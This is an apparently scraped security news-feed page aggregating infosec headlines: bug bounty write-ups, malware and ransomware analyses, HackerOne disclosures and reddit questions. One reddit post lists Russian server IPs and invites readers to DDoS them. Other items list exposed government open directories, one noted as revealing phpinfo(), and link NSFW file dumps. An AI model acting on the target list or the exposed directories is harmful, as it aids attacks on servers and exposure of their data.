    https://www.mendoza.gov.ar/wp-content/uploads/ https://www.mrt.tas.gov.au/mrtdoc/ https://hret.gov.ph/admin.hret.gov.ph/ https://tuguegaraocity.gov.ph/public/ https://tuguegaraocity.gov.ph/admin/ (sometimes throws a PHP error for some reason) https://web.yme.gov.gr/data/ https://geoftp.ibge.gov.br/ http://www.pmf.sc.gov.br/arquivos/arquivos/ http://maps.six.nsw.gov.au/csv/ http://globe.six.nsw.gov.au/csv/ https://irs.os.gov.ng/wp-content/uploads/ https://online.agriculture.gov.au/static/department/ http://itaperuna.rj.gov.br/planoDiretorArquivos/ https://www.czj.sh.gov.cn/zss/ http://www.mto.gov.on.ca/documents/ https://tnlandsurvey.tn.gov.in/assets2/correlation/ (/assets2/ returns 403, /assets/ returns phpinfo()) https://info.saude.df.gov.br/wp-content/uploads/ http://www…
    A full Google Drive as an archive related to my time in Psychic Tv in the ‘90s. Music, photos, multimedia. And current projects.
    submitted by /u/inoculatemedia [link] [comments]
    Movies, shows and 'more'
    http://51.77.66.14/ some good NSFW stuff in sarasa folder submitted by /u/LucasImages [link] [comments]
  • Open

    Attacking IBM MQ — SWIFT to Steal Money$$$
    What is IBM MQ? Continue reading on Medium »
    All about Account Takeover
    Account Takeover Methods Continue reading on InfoSec Write-ups »
    StaFi and Immunefi Partner to Launch A Bug Bounty For rDex Testnet
    Introduction Continue reading on Medium »
    Finding EXIF Geo-location of images
    Let us learn about finding EXIF Geo-Location of images Continue reading on Medium »
    Methods to Bypass two factor Authentication
    There are multiple ways to bypass two factor authentication . some of these way is here . Continue reading on Medium »
    BUG BOUNTY CHECK LIST BY C1
    C1h2e1 Continue reading on Medium »
    Easy Windows 0 day UAC Bypass!
    Hey guys! I am harish, I used to find vulnerabilities on the Microsoft bug bounty program and Google VRP! Continue reading on Medium »
  • Open

    Attacking IBM MQ — SWIFT to Steal Money$$$
    What is IBM MQ? Continue reading on Medium »
    We Put A C2 In Your Notetaking App: OffensiveNotion
    A Red Teaming Science Fair Project Continue reading on Medium »
  • Open

    SecWiki News 2022-02-27 Review
    自定义AWVS的Docker镜像 by sinver 更多最新文章,请访问SecWiki
    SecWiki News 2022-02-27 Review
    自定义AWVS的Docker镜像 by sinver 更多最新文章,请访问SecWiki
  • Open

    Circumventing Deep Packet Inspection with Socat and rot13
    submitted by /u/jrj334 [link] [comments]
    ZDI-CAN-12671: Windows Kernel DoS/Privilege Escalation via a NULL Pointer Deref
    submitted by /u/yuhong [link] [comments]

  • Open

    Intigriti’s February XSS challenge By aszx87410
    February’s XSS challenge is here! On the surface the challenge seems simple but it actually gives light upon two very interesting topics … Continue reading on Medium »
    From zero to hero – XSS
    This article is about what you need to know about Cross-Site-Scripting(AKA. XSS). Continue reading on Medium »
  • Open

    How to geolocate a Twitter video using free OSINT tools
    And how relying on information from the news can set you back. Continue reading on Medium »
    Open Source Intelligence — OSINT
    Open Source Continue reading on Medium »
  • Open

    Fuzzing Network Servers with De-Socketing
    submitted by /u/martinclauss [link] [comments]
    The Ransomware Files podcast: In 2019, 23 cities in Texas were infected with the REvil ransomware in a huge attack. The cities recovered quickly but a MSP, whose ScreenConnect software was exploited, was irreparably damaged. It's a heartbreaking story that reveals the human cost of ransomware.
    submitted by /u/ferrochron1 [link] [comments]
  • Open

    Zulip Cloud security vulnerability with reusable invitation links
    Article URL: https://blog.zulip.com/2022/02/25/zulip-cloud-invitation-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30479430 Points: 81 # Comments: 29
  • Open

    SecWiki News 2022-02-26 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
    SecWiki News 2022-02-26 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Give Me Some (macOS) Context…
    This blog post will dive into what I like to call “execution contexts” on macOS and why it is important to understand these different… Continue reading on Medium »
  • Open

    Wget security questions
    Is there any security concerns with using wget? Is there anything I should be aware of to stay relatively safe? submitted by /u/fenriswolf_411 [link] [comments]
    This sub is being mentioned on Ukraine related subs.
    There are talks requesting that videos, images, etc be archived from r/Ukraine just in case information starts disappearing. Not sure if you guys do that sort of thing but having seen this sub mentioned I figured Id bring it up here. submitted by /u/Tripartist1 [link] [comments]
    The official SteamOS repo, including ISOs of internal versions.
    submitted by /u/wertercatt [link] [comments]
  • Open

    Examining a Windows LTSC system
    How much more difficult is it to gather evidence from a Windows operating system that is the LTSC version when compared with a regular Windows system? I know LTSC is supposed to be much more privacy friendly and disables telemetry so just though I would ask out of curiosity. submitted by /u/xnospax [link] [comments]
  • Open

    Kali Linux: Top 5 tools for information gathering
    What is information gathering? Continue reading on Medium »
    Meu primeiro bug em apenas 5 minutos
    Olá hacker, hoje vou contar sobre como encontrei meu primeiro bug (vulnerabilidade)em apenas 5 minutos Continue reading on Medium »
    SSRF & LFI In Uploads Feature
    Hello fellow hackers, today I will discuss how I found a Server-Side Request Forgery (SSRF) which lead to a Local File Inclusion (LFI)… Continue reading on Medium »
  • Open

    Alan c2 Framework v6.0: Alan + JavaScript = ♡
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    Bypass Email Verification in Customer Portal
    Mattermost disclosed a bug submitted by odx09: https://hackerone.com/reports/1443211 - Bounty: $150
  • Open

    Android App Pentest
    Just got into Android App pentest The app has a functionality to purchase courses So what can be the best way to bypass it Intercepting it through burp and try some manipulation as we do in Web apps Or some Reverse Engineering Stuff will work here ( Which I don't think makes sense ) If anybody has any experience Pentesting apps with similar functionalities Your Help is appreciated!! submitted by /u/Chirag_Offsec22 [link] [comments]
    Moving Into cyber security!
    Switching careers into security Hey everyone! So fairly new to the IT world, as title says I’m switching careers from being an executive chef for the past 16 years into cyber security. I’m starting a 6 month boot camp soon with GSU and afterwards I’ll get my sec+. I’ve been doing a lot of my own research by reading as much as I can, being active in a lot of different forums and have already put 50+ hours on tryhackme (which has been awesome) and putting a lot of work into my home network! The goal is to try and get into a SOC position or something similar and skip the help desk, I’m hoping some of the leadership, team building and communication skills i learned being a chef can help me land these roles. Is there anything I can be doing in the meantime to further help myself? How does this plan sound? Any advice is super helpful!! submitted by /u/Immediate-Ad-8996 [link] [comments]
    I'm getting POST requests from China, a Ukrainian data center, a TOR exit node, and others to my personal project server, any idea what is going on here?
    TL;DR I'm getting POST requests from China, a Ukrainian data center, a TOR exit node, and others to my personal project server, I want to know more and don't know what to do. For some time now, I've been building a cryptocurrency trading bot, but I've left it aside for some time now, letting it collect data while I do other stuff. It will be there when I get back to it. Now that I am thinking of getting back to it, I decide to check in. So, I SSH into my home server, connect to the screen instance, and realize that I'm getting frequent (~1/min) POST requests from some IPs I don't recognize. Now, the only HTTP requests this app is supposed to make are GET requests to the exchange (Kraken) every 5 minutes, so something strange is going on here. In the console, I see multiple lines that l…
  • Open

    开源远程服务器管理工具箱:UltimateShell
    为渗透测试工程师、程序员、网站管理员、IT 管理员以及几乎所有需要以更简单的方式处理远程工作的用户提供大量定制功能。
  • Open

    Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot
    An attack in early February targeted an energy organization in Ukraine with OutSteel and SaintBot. The attack is part of a larger campaign. The post Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot appeared first on Unit42.

  • Open

    Russian-manufactured armored vehicle vulnerability in urban combat (1997)
    Article URL: https://man.fas.org/dod-101/sys/land/row/rusav.htm Comments URL: https://news.ycombinator.com/item?id=30473688 Points: 52 # Comments: 49
    OpenVAS – Open Vulnerability Assessment Scanner
    Article URL: https://openvas.org/ Comments URL: https://news.ycombinator.com/item?id=30469493 Points: 1 # Comments: 0
    Termux Apps Vulnerability Disclosures
    Article URL: https://termux.org/general/2022/02/15/termux-apps-vulnerability-disclosures.html Comments URL: https://news.ycombinator.com/item?id=30468679 Points: 2 # Comments: 0
    CISA: Zabbix servers under attack with recently disclosed vulnerability
    Article URL: https://therecord.media/cisa-zabbix-servers-under-attack-with-recently-disclosed-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30466266 Points: 5 # Comments: 0
  • Open

    Bug Bounty: My Work Schedule
    According to the 2020 H1 report: Continue reading on Medium »
    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    Booked your tickets for IWCON2022 yet? Continue reading on InfoSec Write-ups »
    Authentication Bypass in Admin Panel
    This is my second write-up about finding a bug in admin panel and how i escalated the severity from Low to critical Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CSRF (CROSS SITE REQUEST FORGERY) LAB ÇÖZÜMLERİ
    CSRF (Siteler Arası İstek Sahteciliği), kimliği doğrulanmış kullanıcının web sayfasında istenmeyen faaliyetler gerçekleştirmesine olanak… Continue reading on Medium »
    B̶a̶k̶e̶ Hack your cake!
    “If you can’t bake a cake then hack the entire cake shop” — Vivek Coelho Continue reading on InfoSec Write-ups »
    10 ways to get RCE From LFI
    this illustrates multiple ways to upgrade your LFI to RCE Continue reading on Medium »
    Golden/Silver Ticket Attack | Kerberos | Active Directory |
    In this blog, we are going to talk about golden and silver ticket attacks. Continue reading on Medium »
    A Weird Price Tampering Vulnerability
    Well, Hello Pirates!!!!!!!!!!!!!!!!!!!!!!!!! Long Time No See :D Continue reading on Medium »
    Give me a browser, I’ll give you a Shell
    A restricted browser, that’s all you have… what do you do? Continue reading on Medium »
    Bypassing default visibility for newly-added email in Facebook(Part II - Trusted Contacts)
    After 3 months, I manage to bypassed again the default visibility for newly-added email in Facebook. Here is the link of my first write-up… Continue reading on Medium »
  • Open

    Razzlekahn Part 1: Establishing Some Background.
    If you haven’t seen my introduction to this case, please take few minutes and check out Untangling the Razzlekahn Conspiracy: An OSINT… Continue reading on Medium »
    Untangling the Razzlekahn Conspiracy: An OSINT Perspective.
    Six years ago, 200,000 Bitcoin were stolen from the Bintfinex exchange. the coins remained largely untouched until 2017 when some of the… Continue reading on Medium »
    How to Set Up MISP (Malware Information Sharing Platform)
    MISP (Malware Information Sharing Platform) is a free, open source threat intelligence platform that can store, correlate, and share IoCs… Continue reading on Medium »
    Mosint
    What is mosint ? Continue reading on Medium »
  • Open

    How to Decrypt the Files Encrypted by the Hive Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Pentest-tool: Simple and secure web deployment for pentest and redteam with simwigo
    submitted by /u/B1che [link] [comments]
    BGP Security in 2021
    submitted by /u/danyork [link] [comments]
    Catching bugs in VMware: Carbon Black Cloud Workload Appliance and vRealize Operations Manager
    submitted by /u/scopedsecurity [link] [comments]
  • Open

    [AWC-Pune] - User can download files deleted by Admin using shortcuts
    Lark Technologies disclosed a bug submitted by prateek_thakare: https://hackerone.com/reports/1463028 - Bounty: $550
    [Android] Directory traversal leading to disclosure of auth tokens
    Slack disclosed a bug submitted by danielllewellyn: https://hackerone.com/reports/1378889 - Bounty: $3500
    Hackerone open redirect security alert bypass via view report as PDF
    HackerOne disclosed a bug submitted by iamr0000t: https://hackerone.com/reports/1386277 - Bounty: $500
  • Open

    Readteam-tool: Simple and secure web deployment for pentest and redteam with simwigo
    Simwigo is a cross-plateform tool, written in Go, that allows you to quickly deploy a secure web service (with a nice and neat display:)). It was created to replace the use of tools such as SimpleHTTPServer and http.server from python. It implements additional features allowing easy file exchange. It can be used for a pentest or a redteam, as well as for personal use. An API token authentication, a white list system, and the use of TLS (automatic deployment via Let's Encrypt) are integrated and increase the security of the service. Check out the latest release: https://github.com/8iche/simwigo/ submitted by /u/B1che [link] [comments]
  • Open

    【安全通报】Clash For Windows 远程代码执行漏洞
    近日,Github上曝光了Clash For Windows开源代理工具的远程代码执行漏洞。据了解该漏洞利用细节及漏洞利用代码已在网络上公开,其可能已被在野利用。
  • Open

    【安全通报】Clash For Windows 远程代码执行漏洞
    近日,Github上曝光了Clash For Windows开源代理工具的远程代码执行漏洞。据了解该漏洞利用细节及漏洞利用代码已在网络上公开,其可能已被在野利用。
  • Open

    Pentesting suite for Android suggestions
    Hey everyone, I am looking for a pentesting suite/app for Android, something similiar to what cSploit and zANTI were back in 2014 - 2016, a quick solution to check for most of the basic vulnerabilities. I am aware of Kali NetHunter but, I would like something closer to an app, than a whole other operating system. Is anything like this still out there? I have been out of the Android community for the past 6 or so years. submitted by /u/ivaks1 [link] [comments]
    Does anyone think directory traversal/arbitrary file read is a super powerful vuln type?
    Lets just look at all the obvious uses for it: - auth bypassing/authorization bypassing - useful in rce chains Now let me explain why its a powerful vuln class say you find one on the login page of a website you now have pre auth file read and for example could steal cached session cookies of an admin or crack a hash stored somewhere. This lets you escalate from a guest user all the way to super admin. Now lets say they patch this in a lot of cases you can password spray a random user and find a post auth file read and now instead of an auth bypass its more of an authorization bypass now your a normal user but can read admin areas and admin log files that may have juicy stuff. Ive ran into this scenario many times where they’ll patch a pre auth one but a post auth one quickly gets found. Definitely one of my favorite vulns out there. submitted by /u/Academic-Discount252 [link] [comments]
    Is there any interesting flaws or attacks against SFU’s or selective forwarding units? Would make for a novel bug bounty finding
    Most companies these days are moving towards SFU’s from p2p so it would be interesting to exploit low level sfu implementations for rce and maybe exploit the general logic of an sfu for ip disclosures etc. I haven’t seen like any research on SFU’s. One interesting idea is forcing other clients to connect to you by claiming your an SFU server not even sure if thats possible but would be interesting. submitted by /u/Academic-Discount252 [link] [comments]
    Reference for Snort/Suricata Flowbit Group Names
    I'm researching Snort "flowbit" group names (ex: http.dottedquadhost, userlogin, etc.). Yet, I cannot find any references that cover/explain the variety of group names that can be used. Does anyone know where I can find more information on how these group names are defined? submitted by /u/cyberphor [link] [comments]
    Is this worth it?
    I'm reading up on zero trust and keeping hearing about it but I'm still trying to figure out what tools there are out there. I heard Cloudflare acquired Area 1 for zero trust, but has anyone heard of these guys? https://usenucleus.cloud/ submitted by /u/Ztsec [link] [comments]
    Could it be real helpful for defending Ukraine from Russia?
    A few minutes ago, I checked the twitter of Recoreded Future and Greynoiseio. Both of them anoounced that they would apply full resources and capabilities to support ukraine in their fight against Russia. Trying to find a sub that can aswer this... seems reasonable from someone that knows little about the cyber world, So... Is it really helpful for defend ukraine agianst from russia? https://twitter.com/cahlberg/status/1496874932273389569 https://twitter.com/Andrew___Morris/status/1496923545712091139 submitted by /u/Late_Ice_9288 [link] [comments]
    Question for cybersec seniors
    Hi guys, I have to do a report for uni and gotta ask some questions to a senior in cybersec/infosec since I am starting my career and im a junior. The requirements is that I "interview" someone and I dont know anyone in real life, I hope its okay thank you submitted by /u/Mokushi99 [link] [comments]
    What is the going rate for a zero day these days?
    Curious of what the going rate for a zero day is on the black market; or even the legit market. submitted by /u/me_z [link] [comments]
  • Open

    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    No content preview
  • Open

    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    No content preview
  • Open

    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    No content preview
  • Open

    Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints
    Introduction Will Schroeder and Lee Christensen wrote a research paper on this technique which can be referred to here. In ESC8 technique mentioned in the research The post Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints appeared first on Hacking Articles.
  • Open

    Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints
    Introduction Will Schroeder and Lee Christensen wrote a research paper on this technique which can be referred to here. In ESC8 technique mentioned in the research The post Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints appeared first on Hacking Articles.
  • Open

    Invoke-EDRChecker:一款功能强大的主机安全产品检测工具
    该工具能够对正在运行的进程进行详细的安全检查,包括进程进程元数据、加载到当前进程中的DLL以及每个DLL元数据。
    以数据为中心的数据安全基础能力建设探索
    本文数据为中心的理念,围绕数据识别、分类分级、基础防护几个方面,结合开源软件做一次梳理和功能演示。
    FreeBuf早报 | 三星上亿部手机曝出严重加密漏洞;乌克兰招募黑客防御俄罗斯网络攻击
    由于大规模分布式拒绝服务(DDoS)攻击,多个乌克兰政府网站于周三下线了。
    CISA 已知被利用漏洞列表中,新增两个 Zabbix 漏洞
    美国网络安全基础设施和安全局(CISA) 在其已知利用漏洞目录中新增两个Zabbix 漏洞。
    FreeBuf甲方群话题讨论 | 聊聊复杂形势下的企业安全预算
    《个保法》、《数据安全法》、log4爆发,最近一年来安全圈的频繁动作会给今年企业安全预算带来哪些影响?
    微软应用商店现“克隆”游戏,内涵恶意程序Electron Bot
    通过克隆《地铁跑酷》 和《神庙逃亡》等流行游戏,Electron Bot已渗透进了微软应用商店。
    俄乌战争期间,美国警告要注意“浑水”趁乱搞事情
    美国和英国发布警告称,一个已经确定有伊朗国家背景的黑客组织正在俄乌大战期间,针对全球目标开展数字攻击以及其他的恶意活动。
    微软Exchange服务器被黑客攻击以部署Cuba勒索软件
    勒索软件Cuba正利用微软Exchange的漏洞进入企业网络并对设备进行加密。
    积跬步,至千里,白帽积木的挖洞之路
    近4年,从小白到MVP的挖洞之路。
    研究发现,元宇宙的成人内容对未成年用户开放
    据BBC的一项最新调查,儿童可以通过元宇宙访问性方面的相关内容。
    保护力度不够的Microsoft SQL数据库正成为黑客攻击的目标
    日前有数据显示,黑客正在易受攻击的Microsoft SQL数据库中安装Cobalt Strike信标,以此获得在目标网络中的立足点。
    重磅!全球黑客组织对俄罗斯发起“网络战争”
    战争让人们更加珍惜来之不易的和平:我们从不欢呼战争,但也不惧怕战争。
    如何使用PHP Malware Finder检测主机中潜在的恶意PHP文件
    PHP Malware Finder是一款针对主机安全和PHP安全的强大检测工具,广大研究人员可以轻松检测其主机或服务器中可能存在的潜在恶意PHP文件。
    FreeBuf周报 | Monzo数字银行用户正受网络钓鱼威胁;Meyer披露影响员工的网络攻击
    各位FreeBufer周末好~以下是本周的「FreeBuf周报」,我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!热点资讯1、白宫将乌克兰DDoS攻击锁定在俄罗斯GRU黑客身上2、英国Monzo数字银行用户正受网络钓鱼威胁3、数十位 OpenSea 用户 NFT 被盗,损失超 170 万美元4、暴富、反水、围剿……Conti勒索组织魔幻的2021年5、这样的钓鱼邮
    乌克兰政府和金融机构遭疑似俄黑客袭击
    这一恶意软件被部署在乌克兰网络上的数百台设备当中。
  • Open

    SecWiki News 2022-02-25 Review
    SecCrawler: 每日安全日报的爬虫和推送程序 by ourren cheatsheet: 信安技术羊皮卷 by ourren 代码分析与自动化重构 by ourren 企业级安全智能化实践指南 by ourren 针对Cookie同意和 GDPR 违规的自动化检测工具 by ourren CodeQL 与 Shiro550 碰撞 by ourren 路由器TP-Link WR740后门漏洞 by ourren Parallels Desktop虚拟机逃逸 by ourren k8s安全入门 by ourren 更多最新文章,请访问SecWiki
    SecWiki News 2022-02-25 Review
    SecCrawler: 每日安全日报的爬虫和推送程序 by ourren cheatsheet: 信安技术羊皮卷 by ourren 代码分析与自动化重构 by ourren 企业级安全智能化实践指南 by ourren 针对Cookie同意和 GDPR 违规的自动化检测工具 by ourren CodeQL 与 Shiro550 碰撞 by ourren 路由器TP-Link WR740后门漏洞 by ourren Parallels Desktop虚拟机逃逸 by ourren k8s安全入门 by ourren 更多最新文章,请访问SecWiki
  • Open

    CEH Practical Review/Guide — How to prepare and ace your exam in the first attempt
    My journey for CEH practical exam started when I applied for the scholarship sponsored by the EC-Council. The actual exam cost was 550$… Continue reading on Medium »

  • Open

    CVE-2022-23835: A security analysis of Visual Voicemail
    Article URL: https://gitlab.com/kop316/vvm-disclosure Comments URL: https://news.ycombinator.com/item?id=30461939 Points: 2 # Comments: 0
  • Open

    HermeticWiper: What We Know About New Malware Targeting Ukrainian Infrastructure (Thus Far)
    submitted by /u/jat0369 [link] [comments]
    A Detailed Analysis of the LockBit Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Understanding Threat Actor’s by @berkdusunur
    submitted by /u/EyeAccomplished5529 [link] [comments]
    The Bvp47 - a Top-tier Backdoor of US NSA Equation Group
    submitted by /u/eberkut [link] [comments]
    Logic Flaw Leading to RCE in Dynamicweb 9.5.0 - 9.12.7
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Curious
    out of curiosity are my chances good to land a junior infosec job, SOC analyst, or a sysadmin position based on my work experience it’s not a lot and i am new to the IT field but to sum it all up the only work experience i have is when i was a geek squad agent at best buy, when i worked at a call center, and most recently i got a job as a junior help desk technician i also have 0 certs by the way and i’m too lazy to send it my actual resume hahaha submitted by /u/Jkarl0880 [link] [comments]
    Doubt on Session Cookies
    Hi, I am exploring Burpsuite and HTTP requests. I was convinced that a cookie was only set after login. I tried to intercept a (failed) login on a simple web form and I got this: POST / HTTP/1.1 Host: markup.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 32 Origin: http://markup.htb Connection: close Referer: http://markup.htb/ Cookie: PHPSESSID=33foj37c9f8tburjbdufbtu8ln Upgrade-Insecure-Requests: 1 username=test&password=test I noticed that Cookie header is already present, even before my request can reach webserver. Can someone enlighten me on this ? Thankyou!! submitted by /u/g-simon [link] [comments]
    I found a major security flaw in Lens.com website, need advice on how to proceed
    I apologize if this is the wrong place to ask this question but here goes. Without getting into details I found a way to access a user account without permission. I submitted it to kb.cert.org (didn't know where else to submit it) but they said they don't handle issues with live websites, I also informed Lens.com but honestly they didn't seem to care and have since ghosted me. I don't want to release the details and risk the (I can only assume) 7 people who still use that terrible site but I'm not sure how else to bring enough attention to this to get them to fix it. Any advice? Thanks. submitted by /u/AngryHumanoid [link] [comments]
    Providing SSN over voicemail for employer to access fingerprinting results? is it safe? Says she will delete the voicemail when her meeting sends.
    Ends* not sends, typo. I got fingeprinted for background check (im working in education, working at a private school) and have to tell my ssn to employer so they can log in database to check the fingerprint results before i start. Im not comfortable providing my SSN over email and one of my employers told me that was okay and i can give the employer in charge of it a call. I emailed the employee and she told me that she will be in a meeting until the day ends and if i could leave my SSN through voicemail and she will delete the message once the meeting is over and will run the ssn through the database. she told me she couldnt do tommorow since she was leaving out of country and i need to give it before monday on the day i start to have results checked is this safe to leave a voicemail with my ssn since though she will delete it afterwards? seems it my only option or should i just forget this job altogether if this is my only choice or request someone else who is available to do it with? i think she is the only one..... update : i decided to do it since time was ticking since i start Monday and the employer is off to another country tomorrow so i wont be able to connect with her, which i find very weird. Did i put myself at risk?? probably. Did i feel immediate regret after doing it? Yes i did. nervous as heck, i hope i will be fine after this. submitted by /u/lostspirit10 [link] [comments]
    RSA Netwitness
    Hi guys, I recently started working as QA in NW and wanted to check what folks on field actually think of it. Have you ever tried or had hands on with RSA Netwitness SIEM? Any feedback on UX, Threat hunting, correlation capabilities etc? Thanks! submitted by /u/Peanutbutter-0 [link] [comments]
    Is this tool worth it ?
    I've been following these guys for quite some time now, since a friend of mine working at a large insurance company told me they use the platform internally. But I'm still not sure whether it is worth it. A few days ago, they announced they went open-source, I gave it a try and it looks cool. I run a network scan with multiple tools at the same time(nmap,tsunami,nuclei) and got back a full report with just a few commands. ​ The thing is am still confused, on the difference between the open source and the payed version. Have you tried the platform before ? Do you think it is worth the money? submitted by /u/deadlyhayena [link] [comments]
    Anyone know about difference between BGP and DNS communication?
    Hi guys, i'm student in software engineer major these days, i'm interested in RPKI hijacking. I saw the news that by BGP hijacking, cryptocurrency is now in danger. As far as i know, RPKI is the certificate of the Router, and without RPKI risk of BGP hijacking is more dangerous. But, I can't understand the difference between BGP and DNS communication. Of course i did searching in google, but it is too deep for me to understand. Please teach me the difference between BGP, DNS communication easily...(to the point whre newbies can understand) submitted by /u/Late_Ice_9288 [link] [comments]
    vulnerable?
    Hi guys, how do I find out whether my own ip address is vulnerable atm ? submitted by /u/alicia30765 [link] [comments]
  • Open

    How i Found Single click open redirect at xiaomi ( Arabic )
    Single click open redirect السلام عليكم , اليوم بكتب لكم عن كيف حصلت ثغرة Continue reading on Medium »
    How I Hacked the Dutch Government with SQLi and Won the Famous T-Shirt?
    Hello, those who are at the computer day and night. Continue reading on Medium »
    Take part of our Bug Bounty Program ‍
    As you well know Avacash.Finance is a fork of Tornado.cash in the Avalanche Blockchain, which means that we offer a fully decentralized… Continue reading on Medium »
    Mars Protocol offers up to $1 million payout in bug bounty program with Immunefi
    More than 20 contributors from around the world have spent nearly a year developing Mars from scratch in the Rust programming language… Continue reading on Medium »
    $$$ Bank Verification Bypass(Broken Object Level Authorisation)
    Hey Readers 👋, Hope you are doing great, Continue reading on InfoSec Write-ups »
  • Open

    ODs/Calibre servers from Russia
    In solidarity with ukrainian people, after the cyber attack of russian goverment against ukrainian digital assets to prepare their invasion, you're friendly invited to attack these servers located in Russia unto DDOS. Help us to complete this list : ODs https://julia.paimon.pro/ https://91.240.125.178/ http://files.net57.ru/ http://b1.artplanet.su/ http://5.56.134.67:8080/ http://178.140.239.157/ http://91.214.68.245/ http://212.109.223.247:9000/ http://188.226.41.25/ https://109.194.141.225/ http://5.8.64.57/ https://45.84.225.49/ http://195.218.199.70:8888/ https://193.106.132.50/ http://195.93.160.105/ http://109.200.155.175/ http://176.193.170.202/ http://141.101.188.153/ http://80.78.193.77:8080/ Calibres http://87.117.1.35:9191/ http://90.188.92.137:8080/ http://37.143.24.7:8080/ http://89.111.132.113:8180/ http://80.234.32.202:8888/ http://176.12.99.146:8123/ http://136.169.223.16:8080/ https://195.91.231.203:8443/ I hope the Russians love their children too ! Slava Ukraine ! ​ https://preview.redd.it/h44axndgquj81.jpg?width=281&format=pjpg&auto=webp&s=ea63007f203cd1f7fe4bd3c434620b969861e464 submitted by /u/krazybug [link] [comments]
    Diff links to other places, funny music ect...
    Ok went for a wander and here are a few findings not claiming they are all new but just what I found on a rabbit hole day... https://www.pyrocam.com/files/Video/funny/ next... http://stephenleblanc.com/backup/stephen/projects/Alex%20recovered/BlackBerry/music/Media%20Sync/ next... http://ftp.dyslexicfish.net/music/ next http://mediamusic-journal.com/video/ next https://www.creativebone.co.uk/video next... http://projects.csail.mit.edu/video/history/robotics/ ​ cannabis stuff plus other... https://www.thevespiary.org/library/Files_Uploaded_by_Users/llamabox/ ​ Sounds language stuff... http://211.110.1.18/Suda_Data/ ​ cooking http://www.medigaplife.com/videos/recipes/ ​ Funny's old but still funny gif jpg ect... http://www.brainbox.cc/funny/ ​ Memes what was relevant then... http://www.mercilesstruth.com/memes/ ​ Funny yep just funny, some old chan stuff, vids evt... http://tajgoren.net/bildarkiv/Download/ http://tajgoren.net/bildarkiv/Download/Funny/ ​ Well movies music'ish just stuff... https://johnbot.org/Share/ ​ Lots of images. Stay out of the folder WTF... http://148.72.150.188/archive/access/images/ ​ Images funny'ish do not watch 'SickBoobie Choumi.wmv' http://www.amickracing.com/misc/ ​ Funny, music. MP4s and lots more... http://www.aircam6600.com/1/mp4/ ​ Ok well done if you got through them. You saw the hidden link...;0) submitted by /u/xanderTgreat [link] [comments]
    Just a few xxx links for now...
    Lots of xxx movies https://artserotica.com/videos/ Been posted before but still up http://salepute.fr Short Jav I think some pixelated... https://www.xxxx-videos.com as above... https://kijyoui-douga.com/wp-content/uploads/2017/07/?SD Jav as above http://javichuparadise.com/wp-content/videos/ Not sure if this meets the open directories guides... http://www.wo-fd.xyz/?/ Lots of images with a few vids... http://real-uksex.com/wp-content/uploads/ Lots of MP4's http://24.138.249.6/Peliculas/Adultos/ What it says in the link Mandy Flores porn life images... https://mandyflores.com/content/ Bit of good old BDSM http://213.32.1.25 submitted by /u/xanderTgreat [link] [comments]
  • Open

    The Top-Notch Red Team Penetration Testing Services in Israel, USA, UK
    Continue reading on Medium »
  • Open

    Dispatch From The Digital Fringes (01.022022)
    Welcome to our launch here on Medium! I’m Matt Schultz — former Digital Archivist, Curator & Preservationist. I’m so excited to be… Continue reading on Medium »
    The ultimate guide to threat intelligence for corporate security
    This definitive guide to threat intelligence provides everything you need to know about implementing and using threat intelligence within… Continue reading on Medium »
  • Open

    SecWiki News 2022-02-24 Review
    针对AD CS中ESC7的滥用 by ourren 威胁情报的三个准确定义 by ourren Leveraging machine learning to find security vulnerabilities by ourren 移动互联网应用供应链(SDK)行为安全性现状研究报告 by ourren 基于BERT的Web服务政策合规性衡量方法 by ourren LastPyMile - 甄别软件包源代码和发布版代码的差异性 by ourren 基于机器学习的安全数据集总结 by ourren Xloader 是如何进行加密 C&C 通信的? by Avenger 更多最新文章,请访问SecWiki
    SecWiki News 2022-02-24 Review
    针对AD CS中ESC7的滥用 by ourren 威胁情报的三个准确定义 by ourren Leveraging machine learning to find security vulnerabilities by ourren 移动互联网应用供应链(SDK)行为安全性现状研究报告 by ourren 基于BERT的Web服务政策合规性衡量方法 by ourren LastPyMile - 甄别软件包源代码和发布版代码的差异性 by ourren 基于机器学习的安全数据集总结 by ourren Xloader 是如何进行加密 C&C 通信的? by Avenger 更多最新文章,请访问SecWiki
  • Open

    SockDetour – a Silent, Fileless, Socketless Backdoor – Targets U.S. Defense Contractors
    SockDetour is a custom backdoor being used to maintain persistence, designed to serve as a backup backdoor in case the primary one is removed. The post SockDetour – a Silent, Fileless, Socketless Backdoor – Targets U.S. Defense Contractors appeared first on Unit42.
  • Open

    Zero-day XSS vulnerability in Horde webmail client can be triggered by
    Article URL: https://portswigger.net/daily-swig/lt-p-gt-zero-day-xss-vulnerability-in-horde-webmail-client-can-be-triggered-by-file-preview-function-lt-p-gt Comments URL: https://news.ycombinator.com/item?id=30453652 Points: 2 # Comments: 0
  • Open

    离职后,你会访问前公司账户吗?
    合理的离职流程可以减少离职员工危害前雇主。
    FreeBuf早报 | 美国受到勒索软件警告;乌数百台计算机遭wiper恶意软件攻击
    一名尼日利亚国民在纽约南区地方法院承认侵入一家公司账户并窃取工资存款。
